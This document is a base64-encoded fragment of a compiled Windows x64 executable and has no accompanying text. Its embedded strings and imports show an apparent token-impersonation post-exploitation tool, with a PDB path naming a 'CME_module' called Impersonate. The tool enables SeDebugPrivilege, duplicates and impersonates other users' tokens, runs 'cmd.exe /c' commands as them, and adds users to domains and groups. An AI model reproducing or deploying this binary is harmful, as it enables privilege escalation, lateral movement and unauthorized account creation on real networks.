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AAAABo6gEAAAAAAHrqAQAAAAAAjOoBAAAAAACc6gEAAAAAAKjqAQAAAAAAvuoBAAAAAADM6gEAAAAAAOLqAQAAAAAA9OoBAAAAAAAG6wEAAAAAABLrAQAAAAAAJOsBAAAAAAA06wEAAAAAAELrAQAAAAAAUOsBAAAAAABc6wEAAAAAAHDrAQAAAAAAgOsBAAAAAACS6wEAAAAAAJzrAQAAAAAAqOsBAAAAAAC06wEAAAAAAMrrAQAAAAAA4OsBAAAAAAD66wEAAAAAABTsAQAAAAAALuwBAAAAAAA+7AEAAAAAAFDsAQAAAAAAZOwBAAAAAAB67AEAAAAAAIzsAQAAAAAAAAAAAAAAAAAu6AEAAAAAACDoAQAAAAAAAAAAAAAAAABO6AEAAAAAAAAAAAAAAAAAIAJHZXRDdXJyZW50UHJvY2VzcwDRA0xvY2FsQWxsb2MAADIBRHVwbGljYXRlSGFuZGxlABIET3BlblByb2Nlc3MANARQcm9jZXNzSWRUb1Nlc3Npb25JZAAAjwVTbGVlcABqAkdldExhc3RFcnJvcgAAOQNHbG9iYWxBbGxvYwCJAENsb3NlSGFuZGxlAFEDSGVhcEFsbG9jALgCR2V0UHJvY0FkZHJlc3MAACECR2V0Q3VycmVudFByb2Nlc3NJZAC+AkdldFByb2Nlc3NIZWFwAACBAkdldE1vZHVsZUhhbmRsZVcAAEtFUk5FTDMyLmRsbAAAcAFHZXRUb2tlbkluZm9ybWF0aW9uAKkBTG9va3VwQWNjb3VudFNpZFcA8QBEdXBsaWNhdGVUb2tlbkV4AACLAENyZWF0ZVByb2Nlc3NBc1VzZXJXAAAVAk9wZW5Qcm9jZXNzVG9rZW4AAIsBSW1wZXJzb25hdGVMb2dnZWRPblVzZXIAjQBDcmVhdGVQcm9jZXNzV2l0aFRva2VuVwBsAUdldFNpZFN1YkF1dGhvcml0eQAAbQFHZXRTaWRTdWJBdXRob3JpdHlDb3VudAD0AlNldFRva2VuSW5mb3JtYXRpb24AwQJSZXZlcnRUb1NlbGYAAB8AQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAK8BTG9va3VwUHJpdmlsZWdlVmFsdWVXAEFEVkFQSTMyLmRsbAAA6QBOZXRVc2VyQWRkAACJAE5ldEdyb3VwQWRkVXNlcgBORVRBUEkzMi5kbGwAAOsBTnRRdWVyeU9iamVjdABudGRsbC5kbGwA1QRSdGxDYXB0dXJlQ29udGV4dADcBFJ0bExvb2t1cEZ1bmN0aW9uRW50cnkAAOMEUnRsVmlydHVhbFVud2luZAAAwAVVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAH8FU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAJ4FVGVybWluYXRlUHJvY2VzcwAAjANJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AFIEUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAJQJHZXRDdXJyZW50VGhyZWFkSWQAAPMCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAbwNJbml0aWFsaXplU0xpc3RIZWFkAIUDSXNEZWJ1Z2dlclByZXNlbnQA2gJHZXRTdGFydHVwSW5mb1cA4gRSdGxVbndpbmRFeABBBVNldExhc3RFcnJvcgAAOAFFbnRlckNyaXRpY2FsU2VjdGlvbgAAxANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAFAFEZWxldGVDcml0aWNhbFNlY3Rpb24AawNJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50ALAFVGxzQWxsb2MAALIFVGxzR2V0VmFsdWUAswVUbHNTZXRWYWx1ZQCxBVRsc0ZyZWUAtAFGcmVlTGlicmFyeQDKA0xvYWRMaWJyYXJ5RXhXAABoBFJhaXNlRXhjZXB0aW9uAADcAkdldFN0ZEhhbmRsZQAAJQZXcml0ZUZpbGUAfQJHZXRNb2R1bGVGaWxlTmFtZVcAAGcBRXhpdFByb2Nlc3MAgAJHZXRNb2R1bGVIYW5kbGVFeFcAAN8BR2V0Q29tbWFuZExpbmVBAOABR2V0Q29tbWFuZExpbmVXAFUDSGVhcEZyZWUAAJ4AQ29tcGFyZVN0cmluZ1cAALgDTENNYXBTdHJpbmdXAABYAkdldEZpbGVUeXBlAFgDSGVhcFJlQWxsb2MAfgFGaW5kQ2xvc2UAhAFGaW5kRmlyc3RGaWxlRXhXAACVAUZpbmROZXh0RmlsZVcAkgNJc1ZhbGlkQ29kZVBhZ2UAuwFHZXRBQ1AAAKECR2V0T0VNQ1AAAMoBR2V0Q1BJbmZvAPYDTXVsdGlCeXRlVG9XaWRlQ2hhcgARBldpZGVDaGFyVG9NdWx0aUJ5dGUAQQJHZXRFbnZpcm9ubWVudFN0cmluZ3NXAACzAUZyZWVFbnZpcm9ubWVudFN0cmluZ3NXACQFU2V0RW52aXJvbm1lbnRWYXJpYWJsZVcAWwVTZXRTdGRIYW5kbGUAAOECR2V0U3RyaW5nVHlwZVcAAKgBRmx1c2hGaWxlQnVmZmVycwAACQJHZXRDb25zb2xlT3V0cHV0Q1AAAAUCR2V0Q29uc29sZU1vZGUAAFYCR2V0RmlsZVNpemVFeAAzBVNldEZpbGVQb2ludGVyRXgAAFoDSGVhcFNpemUAAM4AQ3JlYXRlRmlsZVcAJAZXcml0ZUNvbnNvbGVXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKi3y2ZKwAAzV0g0mbU////////AQAAAAEAAAACAAAAAAAIAAAAAAAAAAACAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAwAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA